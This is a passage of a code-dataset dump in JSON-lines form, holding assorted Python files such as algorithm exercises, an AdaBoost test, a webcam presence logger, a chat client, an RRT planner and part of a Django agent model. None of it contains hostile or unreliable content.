psycopg2.DatabaseError) as error:\n return str(error)\n finally:\n if con is not None:\n con.close()\n\nif __name__ == \"__main__\":\n print('this is data object package')","sub_path":"backend/DataObjects.py","file_name":"DataObjects.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"606850291","text":"class Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if not prices:\n return 0\n mini, profit = prices[0], 0\n for i in prices:\n if i>mini:\n profit = max (profit, i-mini)\n else:\n mini=i\n return profit\n\"\"\"\nAll the straight forward solution should work, but if the interviewer twists the question slightly \nby giving the difference array of prices, Ex: for {1, 7, 4, 11}, if he gives {0, 6, -3, 7}, you might end up being confused.\n\ninformal proof on why this problem can be reduced to a contiguous subarray of differences question.\nSuppose we have prices: [1, 7, 4, 11] In other words, [a, b, c, d]\nThe maximum here is 11 - 1, in other words d - a.\nThe maximum subarray would be: (b-a) + (c-b) + (d-c) = -a + b - b + c - c + d = d - a\nHence, the problem is a bijection to the subarray question.\n\nHere, the logic is to calculate the difference (maxCur += prices[i] - prices[i-1]) of the original \narray, and find a contiguous subarray giving maximum profit. If the difference falls below 0, reset it to zero.\n\n public int maxProfit(int[] prices) {\n int maxCur = 0, maxSoFar = 0;\n for(int i = 1; i < prices.length; i++) {\n maxCur = Math.max(0, maxCur += prices[i] - prices[i-1]);\n maxSoFar = Math.max(maxCur, maxSoFar);\n }\n return maxSoFar;\n }\n*maxCur = current maximum value\n\n*maxSoFar = maximum value found so far\n\"\"\"","sub_path":"python/maxProfit.py","file_name":"maxProfit.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467968831","text":"\n'''\n\nImplement an algorithm that determines if a string has all unique characters.\nWhat if you cannot use additional data structures\n\n\nSolution One:\nTime complexity: O(N^2)\niterate over the string and compare each iteration to every other character after its position\n\nSolution Two:\nTime complexity: O(N*log(N))\nsort the string using a sorting algorithm that has a O(N*log(N)) time complexity,\nthen iterate over the sorted string and compare each value to its neighbor\n\n\n#I will be demonstrating solution one\n'''\n\ndef unique_b(string):\n for i, char in enumerate(string):\n for j in range(i+1, len(string)):\n if char == string[j]:\n return False\n return True\n\n","sub_path":"Chapter1/1.1b.py","file_name":"1.1b.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"434715008","text":"# _*_ coding:utf-8 _*_\nimport pandas as pd\nimport numpy as np\n\n# 获取数据集(20190301.csv)\nfrom algo.Adaboost import AdaClassify, AdaboostTrainDS\nfrom draw import plotROC\nfrom util.dataprocess import split_train_test\n\ndata = pd.read_csv('../data/day_stock_process/20190301.csv', index_col=0)[['open', 'high', 'low', 'close',\n 'pre_close', 'change', 'pct_chg', 'vol',\n 'amount',\n 'label']]\n# 打乱数据集\ndata_index = np.arange(data.shape[0])\nnp.random.shuffle(data_index)\ndata = data.iloc[data_index]\n\n# 划分数据集\ntrain_X, train_Y, test_X, test_Y = split_train_test(data)\n\n# 练得到弱分类器信息\nweakClass, aggClass = AdaboostTrainDS(train_X, train_Y, 7)\nprint(weakClass)\n# plotROC(aggClass.T,train_Y)\n\n# 使用弱分类器对特征矩阵进行分类\npredictions, aggClass0 = AdaClassify(train_X, weakClass)\n\n\n# 计算训练集分类准确率\nm = train_X.shape[0]\ntrain_re = 0 # 训练集分正确的样本个数\nfor i in range(m):\n if predictions[i] == train_Y[i]:\n train_re += 1\ntrain_acc = train_re / m\ntrain_acc = round(train_acc*100,2)\nprint(f'训练集准确率为{train_acc}')\n\n# 计算测试集分类准确率\ntest_re = 0\nTP = 0\nFP = 0\nFN = 0\nTN = 0\nn = test_X.shape[0]\npredictions, aggClass1 = AdaClassify(test_X, weakClass)\n\nfor i in range(n):\n if predictions[i]==1 and test_Y[i]==1:\n TP += 1\n if predictions[i] == 1 and test_Y[i] == -1:\n FP += 1\n if predictions[i]==-1 and test_Y[i]==1:\n FN += 1\n if predictions[i]==-1 and test_Y[i]==-1:\n TN += 1\n if predictions[i] == test_Y[i]:\n test_re += 1\ntest_acc = test_re / n\ntest_acc = round(test_acc*100,2)\nprint(f'测试集准确率为{test_acc}')\nprint(f'TP:{TP}')\nprint(f'FP:{FP}')\nprint(f'FN:{FN}')\nprint(f'TN:{TN}')","sub_path":"test/adaboost_prediction_v2.py","file_name":"adaboost_prediction_v2.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511615165","text":"from datetime import datetime\nimport cv2\nimport sqlite3\n\n\n\ndef insertPresent(dt):\n conn = sqlite3.connect(\"facebase.db\")\n cmd = \"insert into WORKHOUR (User_Present) values('\"+ dt + \"')\"\n conn.execute(cmd)\n conn.commit()\n conn.close()\n\n\ndef insertMovedAway(dt):\n conn = sqlite3.connect(\"facebase.db\")\n cmd = \"insert into WORKHOUR (User_Moved_Away) values('\" + dt + \"')\"\n conn.execute(cmd)\n conn.commit()\n conn.close()\n\n\ndef surveillence():\n statusList = [None, None]\n cam = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n while True:\n ret, frame = cam.read()\n status = 0\n if ret:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n if firstFrame is None:\n firstFrame = gray\n continue\n\n deltaFrame = cv2.absdiff(firstFrame, gray)\n threshDelta = cv2.threshold(deltaFrame, 30, 255, cv2.THRESH_BINARY)[1]\n threshDelta = cv2.dilate(threshDelta, None, iterations=0)\n (cnts, _) = cv2.findContours(threshDelta.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in cnts:\n if 8000< cv2.contourArea(contour)< 15000:\n status=1\n (x,y,w,h) = cv2.boundingRect(contour)\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)\n statusList.append(status)\n\n statusList1 = statusList[-2:]\n\n if statusList1[-1] == 1 and statusList1[-2] == 0:\n up=str(datetime.now())\n #print('user is there at:' + up)\n insertPresent(up)\n if statusList1[-1] == 0 and statusList1[-2] == 1:\n ua=str(datetime.now())\n #print('user moved away at:' + ua)\n insertMovedAway(ua)\n\n\n cv2.imshow('frame', frame)\n cv2.waitKey(500)\n if cv2.waitKey(500) == ord('q'):\n break\n else:\n print('preparing camera:')\n pass\n\n cam.release()\n cv2.destroyAllWindows()\n print(statusList)\n\n\nsurveillence()\n","sub_path":"objectDetector.py","file_name":"objectDetector.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"366568281","text":"from ddt import ddt\r\nfrom ddt import unpack\r\nfrom ddt import data\r\nfrom Bank import bank_addUser\r\nfrom unittest import TestCase\r\n\r\n\r\n# username, password, country, province, street, door, money\r\nda=[\r\n [\"二狗子\", 123456, \"中国\", \"北京\", \"沙阳路\", \"s001\", 5000, 1],\r\n [\"二狗子\", 123456, \"中国\", \"北京\", \"沙阳路\", \"s001\", 5000, 2],\r\n [\"二狗子s\", 123456, \"中国\", \"北京\", \"沙阳路\", \"s001\", 5000, 1],\r\n]\r\n@ddt\r\nclass TestBank1(TestCase):\r\n for i in range(96):\r\n name = \"二狗子\" + str(i)\r\n da.append([name,123456,\"中国\", \"北京\", \"沙阳路\", \"s001\", 5000,1])\r\n da.append([\"二狗子dd\",123456,\"中国\", \"北京\", \"沙阳路\", \"s001\", 5000,3])\r\n\r\n @data(*da)\r\n @unpack\r\n def testAddUser(self,a,b,c,d,e,f,g,h):\r\n\r\n s = bank_addUser(a,b,c,d,e,f,g)\r\n self.assertEqual(h,s)\r\n\r\n\r\n","sub_path":"testaddUser.py","file_name":"testaddUser.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"329438584","text":"import sys\nimport traceback\n\nfrom django.conf import settings\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import exception_handler\nfrom sentry_sdk import capture_exception\n\n\ndef custom_exception_handler(exc, context) -> Response:\n \"\"\"\n Handle API exceptions.\n\n Produces response data with this structure:\n\n {\n \"message\" : \"Invalid input.\",\n \"errors\" : [\n {\n \"field\" : \"name\",\n \"message\" : \"This field is required.\"\n }\n ]\n }\n\n The `message` string is always present but the `errors` array may not.\n\n Inspired by, but simpler than, https://github.com/FutureMind/drf-friendly-errors\n which is currently unmaintained and not compatible with latest DRF.\n \"\"\"\n # Call rest_framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler(exc, context)\n\n if response is not None:\n # Restructure the standard error response\n # so it has a consistent shape\n data = {}\n\n message = getattr(exc, \"default_detail\", None)\n if \"detail\" in response.data:\n message = str(response.data[\"detail\"])\n del response.data[\"detail\"]\n data[\"message\"] = message\n\n errors = []\n items = (\n response.data.items()\n if isinstance(response.data, dict)\n else [(None, message) for message in response.data]\n )\n for key, value in items:\n message = (\n \". \".join([str(item) for item in value])\n if isinstance(value, list)\n else str(value)\n )\n error = {\"field\": key, \"message\": message}\n errors.append(error)\n\n if len(errors):\n data[\"errors\"] = errors\n\n # Always return JSON errors\n return Response(\n data, status=response.status_code, content_type=\"application/json\"\n )\n\n # rest_framework did not handle this exception so\n # generate a API response to prevent it from getting handled by the\n # default Django HTML-generating 500 handler\n data = {\"message\": str(exc)}\n stack = traceback.format_exc()\n sys.stderr.write(stack)\n if settings.DEBUG:\n data[\"traceback\"] = stack\n if hasattr(settings, \"SENTRY_DSN\") and settings.SENTRY_DSN:\n capture_exception(exc)\n return Response(data, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","sub_path":"manager/manager/api/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"244362889","text":"\"\"\"\nThis is ninth task from Python Course - Basic (Day 13 of the course)\nDone by DirtySiwy12\n\nTask 9.4.2: Create a Pong (ball).\n\"\"\"\n\nimport os\nimport time\nimport pygame.locals\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nDARK_BLUE = (0, 0, 128)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nPINK = (255, 200, 200)\nYELLOW = (255, 255, 0)\n\npygame.init()\n\nsize = width, height = 640, 480\nspeed_x, speed_y = 2, 2\n\nscreen = pygame.display.set_mode(size, 0, 32)\n\n# Take the ball from images, and make it an object\nball = pygame.image.load(os.path.join('../images', 'intro_ball.gif'))\nball_rect = ball.get_rect()\n\nloop_end = False\n\nwhile not loop_end:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n loop_end = True\n\n elif event.type == pygame.locals.KEYDOWN:\n if event.key == pygame.locals.K_q:\n loop_end = True\n break\n\n # Give ball movement\n ball_rect = ball_rect.move((speed_x, speed_y))\n\n # Give some simple physics\n if ball_rect.left < 0 or ball_rect.right > width:\n speed_x = -speed_x\n if ball_rect.top < 0 or ball_rect.bottom > height:\n speed_y = -speed_y\n\n # Take it to the screen\n screen.fill(BLACK)\n screen.blit(ball, ball_rect)\n pygame.display.update()\n time.sleep(.01)\n\npygame.quit()\n","sub_path":"Task_09_Games/Game_04_Pong/Pong_Ball.py","file_name":"Pong_Ball.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522592848","text":"import os\ntrainpath = 'test'\n\n\n# Get image list\ndef getImageList():\n imagelist = [os.path.join(parent, filename)\n if filename.lower().endswith((\n '.bmp', '.dib', '.png', '.jpg', '.jpeg', '.pbm',\n '.pgm', '.ppm', '.tif', '.tiff'))\n else None\n for parent, dirnames, filenames in os.walk(trainpath)\n for filename in filenames]\n return [filename for filename in imagelist if filename is not None]\n\n\ndef argwrapper(args):\n return args[0](*args[1:])\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"637217802","text":"from PyQt5.QtWidgets import QApplication,QWidget,QGridLayout,QLineEdit,QDoubleSpinBox,QPushButton,QMessageBox,QLabel\r\nfrom PyQt5 import QtCore,QtWidgets,QtGui\r\nimport sys\r\nimport os \r\n\r\nclass vol_panel(QWidget):\r\n\r\n def __init__(self,parent=None):\r\n super(vol_panel,self).__init__()\r\n self.initUi()\r\n\r\n def initUi(self):\r\n init_vol1 = [5,1,-0.7,1,5]\r\n init_vol2 = [5,1,-0.33,1,5]\r\n layout = QGridLayout()\r\n for i in range(5):\r\n var1 = 'vol1'+str(i+1)\r\n var2 = 'vol2'+str(i+1)\r\n\r\n exec(var1+'=QDoubleSpinBox()')\r\n exec(var2+'=QDoubleSpinBox()')\r\n\r\n l11 = var1+'.setRange(-10,10)'\r\n l21 = var2+'.setRange(-10,10)'\r\n\r\n l12 = var1+'.setDecimals(2)'\r\n l22 = var2+'.setDecimals(2)'\r\n\r\n l13 = var1+'.setValue('+str(init_vol1[i])+')'\r\n l23 = var2+'.setValue('+str(init_vol2[i])+')'\r\n\r\n l14 = var1+'.setSingleStep(0.01)'\r\n l24 = var2+'.setSingleStep(0.01)'\r\n\r\n line1 = [l11,l12,l13,l14]\r\n line2 = [l21,l22,l23,l24]\r\n\r\n for k in range(4):\r\n exec(line1[k])\r\n exec(line2[k])\r\n \r\n add_code1 = 'layout.addWidget('+var1+',1,'+str(i+1)+')'\r\n add_code2 = 'layout.addWidget('+var2+',2,'+str(i+1)+')'\r\n eval(add_code1)\r\n eval(add_code2)\r\n #eval(add_code2)\r\n\r\n \r\n add_attr1 = 'self.'+var1+'='+var1\r\n add_attr2 = 'self.'+var2+'='+var2\r\n exec(add_attr1)\r\n exec(add_attr2)\r\n\r\n btn = QPushButton('Apply')\r\n btn.clicked.connect(self.set_value)\r\n\r\n layout.addWidget(btn,3,2)\r\n l1 = QLabel('Left')\r\n l2 = QLabel('Right')\r\n layout.addWidget(l1,1,0)\r\n layout.addWidget(l2,2,0)\r\n\r\n self.setLayout(layout)\r\n self.message = QMessageBox()\r\n\r\n def set_value(self):\r\n # print(self.vol11)\r\n vol1 = [0]*5\r\n vol2 = [0]*5\r\n for k in range(2):\r\n for i in range(5):\r\n code = 'vol'+str(k+1)+'['+str(i)+']=self.vol'+str(k+1)+str(i+1)+'.value()'\r\n exec(code)\r\n vol = vol1+vol2\r\n new_vol = 'vol = '+str(vol)\r\n \r\n #self.message.setText('确定设置此电压?')\r\n #self.message.exec_()\r\n f=open('vol-template.py','r')\r\n con = f.read()\r\n con1 = con.replace('vol = [5.0,1.,-0.75,1.,5.0]+[5.,1.,-0.35,1.,5.]',new_vol)\r\n f.close()\r\n f = open('set_voltage.py','w')\r\n f.write(con1)\r\n f.close()\r\n\r\n os.system('set_voltage.bat')\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n ex = vol_panel()\r\n ex.show()\r\n sys.exit(app.exec_())","sub_path":"Voltage/vol-panel.py","file_name":"vol-panel.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"509960656","text":"#!/usr/bin/env python2\n\nfrom rrt_node import RRTNode, raytrace\nfrom sensor import Sensor\nfrom rtree import index\nimport random\nimport numpy as np\nfrom sklearn import preprocessing\nfrom math import log\n\n\nclass RRT:\n def __init__(self, root_position, bbx_min, bbx_max, radius, extension_range):\n self._bbx_min = bbx_min\n self._bbx_max = bbx_max\n self._radius = radius\n self._extension_range = extension_range\n\n # Create r-tree\n p = index.Property()\n p.dimension = 2\n self._tree = index.Index(properties=p)\n\n self._id = 0\n self._root = self.create_new_node(root_position)\n self.insert(self._root, None)\n\n def sample(self):\n position = np.array([[0, 0]], dtype=np.float)\n for i in range(0, len(position[0])):\n position[0][i] = random.uniform(self._bbx_min[i], self._bbx_max[i])\n return self.create_new_node(position)\n\n def create_new_node(self, position):\n node = RRTNode(self._id, position)\n self._id += 1\n return node\n\n def expand_tree(self, grid_map, sensor, l):\n new_node = self.sample()\n\n return self.extend(grid_map, sensor, l, new_node)\n\n def extend(self, grid_map, sensor, l, new_node):\n closest_node = self.get_closest(new_node)\n new_node = self.restrict_distance(new_node, closest_node)\n\n if self.valid_node(grid_map, new_node, closest_node):\n near_nodes = self.get_near(new_node)\n if closest_node in near_nodes:\n near_nodes.remove(closest_node)\n parent = self.choose_parent(\n grid_map, sensor, l, near_nodes, closest_node, new_node)\n if parent in near_nodes:\n near_nodes.remove(parent)\n self.insert(new_node, parent)\n self.rewire(grid_map, sensor, l, near_nodes, new_node)\n return new_node\n\n return None\n\n def choose_parent(self, grid_map, sensor, l, near_nodes, closest_node, new_node):\n max_score = new_node.score_with_parent(\n closest_node, grid_map, sensor, l)\n best_parent = closest_node\n for node in near_nodes:\n if self.valid_node(grid_map, new_node, node):\n new_score = new_node.score_with_parent(\n node, grid_map, sensor, l)\n if max_score < new_score:\n max_score = new_score\n best_parent = node\n return best_parent\n\n def rewire(self, grid_map, sensor, l, near_nodes, new_node):\n for node in near_nodes:\n if self.valid_node(grid_map, node, new_node):\n if node.score(grid_map, sensor, l) < node.score_with_parent(new_node, grid_map, sensor, l):\n self.update(node, new_node)\n\n def valid_node(self, grid_map, node, parent):\n node_position = node.get_position()\n node_map_coord = [(node_position[0][0] - grid_map.info.origin.position.x) / grid_map.info.resolution,\n (node_position[0][1] - grid_map.info.origin.position.y) / grid_map.info.resolution]\n\n parent_position = parent.get_position()\n parent_map_coord = [(parent_position[0][0] - grid_map.info.origin.position.x) / grid_map.info.resolution,\n (parent_position[0][1] - grid_map.info.origin.position.y) / grid_map.info.resolution]\n\n start = np.array([parent_map_coord], dtype=np.float)\n end = np.array([node_map_coord], dtype=np.float)\n # radius_in_grid = (self._radius / grid_map.info.resolution) + 3\n\n t = raytrace((start[0][0], start[0][1]), (end[0][0], end[0][1]))\n if 1 < len(t):\n for (t_x, t_y) in t[1:]:\n if 0 != grid_map.data[t_y * grid_map.info.width + t_x]:\n return False\n\n # Check last node\n if 0 != grid_map.data[int(end[0][1]) * grid_map.info.width + int(end[0][0])]:\n return False\n\n return True\n\n def distance_to_line_segment(self, start, end, point):\n length = np.linalg.norm(end - start)\n np.linalg.norm\n\n if 0 == length:\n return np.linalg.norm(start - point)\n\n t = max(0, min(1, np.dot(np.reshape(point - start, 2),\n np.reshape(end - start, 2)) / (length ** 2)))\n projection = start + (t * (end - start))\n\n return np.linalg.norm(point - projection)\n\n def insert(self, node, parent):\n self.update(node, parent)\n position = node.get_position()\n self._tree.insert(\n node.get_id(), (position[0][0], position[0][1]), obj=node)\n\n def update(self, node, new_parent):\n node.set_parent(new_parent)\n\n def erase(self, node):\n if node.has_children():\n pass # TODO: Throw error\n\n node.set_parent(None)\n # Remove from tree\n position = node.get_position()\n self._tree.delete(\n node.node_id, (position[0][0], position[0][1]))\n\n def get_closest(self, node):\n # Get the closest node\n position = node.get_position()\n hits = list(self._tree.nearest(\n (position[0][0], position[0][1]), 1, objects=True))\n assert(1 <= len(hits))\n return hits[0].object\n\n def get_near(self, node):\n # Get nodes that are nearby\n position = node.get_position()\n bbx = (position[0][0] - self._extension_range, position[0][1] - self._extension_range,\n position[0][0] + self._extension_range, position[0][1] + self._extension_range)\n hits = self._tree.intersection(bbx, objects=True)\n nodes = []\n for hit in hits:\n nodes.append(hit.object)\n return nodes\n\n def restrict_distance(self, node, closest_node):\n origin = closest_node.get_position()\n direction = node.get_position() - origin\n\n if np.linalg.norm(direction) > self._extension_range:\n direction = self._extension_range * \\\n preprocessing.normalize(direction, norm=\"l2\")\n node.set_position(origin + direction)\n\n return node\n\n def get_nodes(self, grid_map):\n bbx = (grid_map.info.origin.position.x, grid_map.info.origin.position.y, grid_map.info.origin.position.x + (grid_map.info.width *\n grid_map.info.resolution), grid_map.info.origin.position.y + (grid_map.info.height * grid_map.info.resolution))\n hits = self._tree.intersection(bbx, objects=True)\n nodes = []\n for hit in hits:\n nodes.append(hit.object)\n return nodes\n","sub_path":"scripts/rrt.py","file_name":"rrt.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"269908039","text":"# this file is only for testing the server. In case of java server add \\n to message before sending\n\nimport socket\nimport pyaudio\nfrom time import sleep\nfrom threading import Thread;\n\nHOST, PORT, BUFFER = \"\", 5000, 10\n\n\n# voice chat is second thread in client\n# when user clicks on join audio button create this object and call .start() method\nclass Voice_chat(Thread):\n\n\tdef __init__(self,req_list):\n\t\tThread.__init__(self)\n\t\tself.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\t\tself.meeting_key = req_list[2]\n\t\tself.meeting_val = req_list[3]\n\t\tself.username = req_list[1]\n\t\tself.init_req = \"audio:\" + self.username + \":\" + self.meeting_key + \":\" + self.meeting_val\n\t\tself.audio_player = pyaudio.PyAudio()\n\t\tself.playing_stream = self.audio_player.open(format=pyaudio.paInt16, channels=1, rate=20000, output=True, frames_per_buffer=1024)\n\t\tself.recording_stream = self.audio_player.open(format=pyaudio.paInt16, channels=1, rate=20000, input=True, frames_per_buffer=1024)\n\t\tself.kill_thread = False\n\n\tdef receive_audio(self):\n\t\twhile not self.kill_thread:\n\t\t\ttry:\n\t\t\t\tdata = self.sock.recv(1024)\n\t\t\t\tself.playing_stream.write(data)\n\t\t\texcept Exception as e:\n\t\t\t\tpass\n\n\n\tdef send_audio(self):\n\t\twhile not self.kill_thread:\n\t\t\ttry:\n\t\t\t\tdata = self.recording_stream.read(1024)\n\t\t\t\tself.sock.send(data)\n\t\t\texcept Exception as e:\n\t\t\t\tpass\n\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.sock.connect((HOST, PORT))\n\t\texcept Exception as e:\n\t\t\treturn\n\t\t\n\t\tprint(\"[AUDIO:SUCCESS]![connected to server]\")\n\n\t\ttry:\n\t\t\tself.sock.send(Client.get_length(self.init_req).encode('utf8'))\n\t\t\tself.sock.send(self.init_req.encode('utf8'))\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\treturn\n\t\t\n\t\tprint(\"[AUDIO:SUCCESS]![request send to server]\")\n\n\t\ttry:\n\t\t\tlength = int(self.sock.recv(BUFFER).decode('utf8'))\n\t\t\tmessage = self.sock.recv(length).decode('utf8') \n\t\texcept Exception as e:\n\t\t\treturn\n\n\t\tprint(message)\n\t\tif \"1\" in message:\n\t\t\tthread = Thread(target = self.send_audio).start()\n\t\t\tself.receive_audio()\n\t\telse:\n\t\t\tprint(\"[AUDIO:CLIENT]![Incorrect creadentials]\")\n\n\n# Client is main thread\n# when user clicks join/create meeting create this object\n# for now \"audio\" is handled by this class audio not working\nclass Client:\n\n\tdef __init__(self):\n\t\tself.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tself.sock.connect((HOST, PORT))\n\t\texcept Exception as e:\n\t\t\tprint(\"[CONNECT:SERVER]![connection refused by server]\")\n\t\telse:\n\t\t\tself.request = input()\n\t\t\tself.init_req = self.request.split(\":\")\n\t\t\ttry:\n\t\t\t\tself.sock.send((self.get_length(self.request)).encode('utf8'))\n\t\t\t\tself.sock.send(self.request.encode('utf8'))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[SEND:SERVER]![connection pipeline broken] : \" , e)\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tlength = int(self.sock.recv(BUFFER).decode('utf8'))\n\t\t\t\t\tself.response = self.sock.recv(length).decode('utf8')\n\t\t\t\t\tprint(self.response)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(\"[RECEIVE:SERVER]![connection pipeline broken]\")\n\t\t\t\telse:\n\t\t\t\t\tif \"1\" in self.response:\n\t\t\t\t\t\tif self.init_req[0] == \"audio\":\n\t\t\t\t\t\t\tvoice_chat = Voice_chat(self.init_req)\n\t\t\t\t\t\t\tvoice_chat.start()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tthread = Thread(target = self.send_text, args = ()).start()\n\t\t\t\t\t\t\tself.recv_text()\n\n\t@staticmethod\n\tdef get_length(message):\n\t\tlength = str(len(message));\n\t\tlength += \" \"*(BUFFER - len(length))\n\t\treturn length\n\n\tdef send_text(self):\n\t\twhile 1:\n\t\t\tmessage = input(\"Enter message : \")\n\t\t\tif message == \"exit\":\n\t\t\t\tself.sock.close()\n\t\t\t\tbreak\n\t\t\ttry:\n\t\t\t\tself.sock.send(self.get_length(message).encode('utf8'))\n\t\t\t\tself.sock.send(message.encode('utf8'))\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[SEND:SERVER]![can't send to server]\")\n\n\tdef recv_text(self):\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\tlength = int(self.sock.recv(BUFFER).decode('utf8'))\n\t\t\t\tmessage = self.sock.recv(length).decode('utf8')\n\t\t\texcept Exception as e:\n\t\t\t\tprint(\"[SEND:SERVER]![can't recv from server]\")\n\t\t\telse:\n\t\t\t\tprint(message)\n\nclient = Client()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"278862963","text":"import requests\nimport datetime as dt\nimport time\nimport hashlib\nimport secrets\nimport base64\nfrom Crypto.Cipher import AES\nfrom binascii import unhexlify\nimport validators\nimport random\nimport string\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.contrib.postgres.fields import JSONField\n\nfrom core.models import TZ_CHOICES\n\nimport automation\n\n\nclass Agent(models.Model):\n version = models.CharField(default=\"0.1.0\", max_length=255)\n operating_system = models.CharField(null=True, max_length=255)\n plat = models.CharField(max_length=255, null=True)\n plat_release = models.CharField(max_length=255, null=True)\n hostname = models.CharField(max_length=255)\n local_ip = models.TextField(null=True)\n agent_id = models.CharField(max_length=200)\n last_seen = models.DateTimeField(null=True, blank=True)\n services = JSONField(null=True)\n public_ip = models.CharField(null=True, max_length=255)\n total_ram = models.IntegerField(null=True)\n used_ram = models.IntegerField(null=True)\n disks = JSONField(null=True)\n boot_time = models.FloatField(null=True)\n logged_in_username = models.CharField(null=True, max_length=200)\n client = models.CharField(max_length=200)\n antivirus = models.CharField(default=\"n/a\", max_length=255)\n site = models.CharField(max_length=150)\n monitoring_type = models.CharField(max_length=30)\n description = models.CharField(null=True, max_length=255)\n mesh_node_id = models.CharField(null=True, max_length=255)\n overdue_email_alert = models.BooleanField(default=False)\n overdue_text_alert = models.BooleanField(default=False)\n overdue_time = models.PositiveIntegerField(default=30)\n check_interval = models.PositiveIntegerField(default=120)\n needs_reboot = models.BooleanField(default=False)\n managed_by_wsus = models.BooleanField(default=False)\n is_updating = models.BooleanField(default=False)\n choco_installed = models.BooleanField(default=False)\n wmi_detail = JSONField(null=True)\n time_zone = models.CharField(\n max_length=255, choices=TZ_CHOICES, null=True, blank=True\n )\n policy = models.ForeignKey(\n \"automation.Policy\",\n related_name=\"agents\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n\n def __str__(self):\n return self.hostname\n\n @property\n def timezone(self):\n # return the default timezone unless the timezone is explicity set per agent\n if self.time_zone is not None:\n return self.time_zone\n else:\n from core.models import CoreSettings\n\n return CoreSettings.objects.first().default_time_zone\n\n @property\n def status(self):\n offline = dt.datetime.now(dt.timezone.utc) - dt.timedelta(minutes=4)\n overdue = dt.datetime.now(dt.timezone.utc) - dt.timedelta(\n minutes=self.overdue_time\n )\n\n if self.last_seen is not None:\n if (self.last_seen < offline) and (self.last_seen > overdue):\n return \"offline\"\n elif (self.last_seen < offline) and (self.last_seen < overdue):\n return \"overdue\"\n else:\n return \"online\"\n else:\n return \"offline\"\n\n @property\n def has_patches_pending(self):\n\n if self.winupdates.filter(action=\"approve\").exists():\n return True\n else:\n return False\n\n @property\n def salt_id(self):\n return f\"{self.hostname}-{self.pk}\"\n\n @property\n def checks(self):\n total, passing, failing = 0, 0, 0\n\n if self.agentchecks.exists():\n for i in self.agentchecks.all():\n total += 1\n if i.status == \"passing\":\n passing += 1\n elif i.status == \"failing\":\n failing += 1\n\n has_failing_checks = True if failing > 0 else False\n\n ret = {\n \"total\": total,\n \"passing\": passing,\n \"failing\": failing,\n \"has_failing_checks\": has_failing_checks,\n }\n return ret\n\n @property\n def cpu_model(self):\n try:\n cpu = self.wmi_detail[\"cpu\"][0]\n return [x[\"Name\"] for x in cpu if \"Name\" in x][0]\n except:\n return \"unknown cpu model\"\n\n @property\n def local_ips(self):\n try:\n ips = self.wmi_detail[\"network_config\"]\n ret = []\n for _ in ips:\n try:\n addr = [x[\"IPAddress\"] for x in _ if \"IPAddress\" in x][0]\n except:\n continue\n else:\n for ip in addr:\n if validators.ipv4(ip):\n ret.append(ip)\n\n if len(ret) == 1:\n return ret[0]\n else:\n return \", \".join(ret)\n except:\n return \"error getting local ips\"\n\n @property\n def make_model(self):\n try:\n comp_sys = self.wmi_detail[\"comp_sys\"][0]\n comp_sys_prod = self.wmi_detail[\"comp_sys_prod\"][0]\n make = [x[\"Vendor\"] for x in comp_sys_prod if \"Vendor\" in x][0]\n model = [x[\"SystemFamily\"] for x in comp_sys if \"SystemFamily\" in x][0]\n if not make or not model:\n return [x[\"Version\"] for x in comp_sys_prod if \"Version\" in x][0]\n else:\n return f\"{make} {model}\"\n except:\n return \"unknown make/model\"\n\n @property\n def 